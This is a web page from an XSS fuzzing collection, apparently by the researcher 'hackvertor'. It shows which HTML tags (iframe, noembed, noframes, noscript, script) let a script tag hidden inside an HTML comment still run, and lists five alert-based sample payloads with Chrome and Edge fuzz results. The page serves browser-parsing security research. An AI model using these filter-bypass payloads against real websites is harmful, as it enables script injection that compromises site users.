Tags that DO NOT support HTML comments

Chrome logo 5
Edge logo 5

This vector attempts to show which HTML tags DO NOT support HTML comments.

Created by: hackvertor

Created on: Sunday, January 26, 2025 at 7:17:15 PM

Updated on: Tuesday, February 18, 2025 at 5:18:31 AM

Vector type: XSS

Vector charset: UTF-8

Template used:
<$[data1]><!-- </$[data1]><script>log('$[data1]')</script></$[data1]>  -->
Your browser was detected as:
Detecting... Detecting... Detecting... Detecting...

Sample payloads

<iframe><!-- </iframe><script>alert('iframe')</script></iframe>  -->
<noembed><!-- </noembed><script>alert('noembed')</script></noembed>  -->
<noframes><!-- </noframes><script>alert('noframes')</script></noframes>  -->
<noscript><!-- </noscript><script>alert('noscript')</script></noscript>  -->
<script><!-- </script><script>alert('script')</script></script>  -->

Fuzz results

Chrome logo
Chrome 132.0.0.0 desktop macOS 10.15.7

Updated

Sun Jan 26 2025
Found 5 results
Loading...
Edge logo
Microsoft Edge 132.0.0.0 desktop macOS 10.15.7

Updated

Wed Feb 05 2025
Found 5 results
Loading...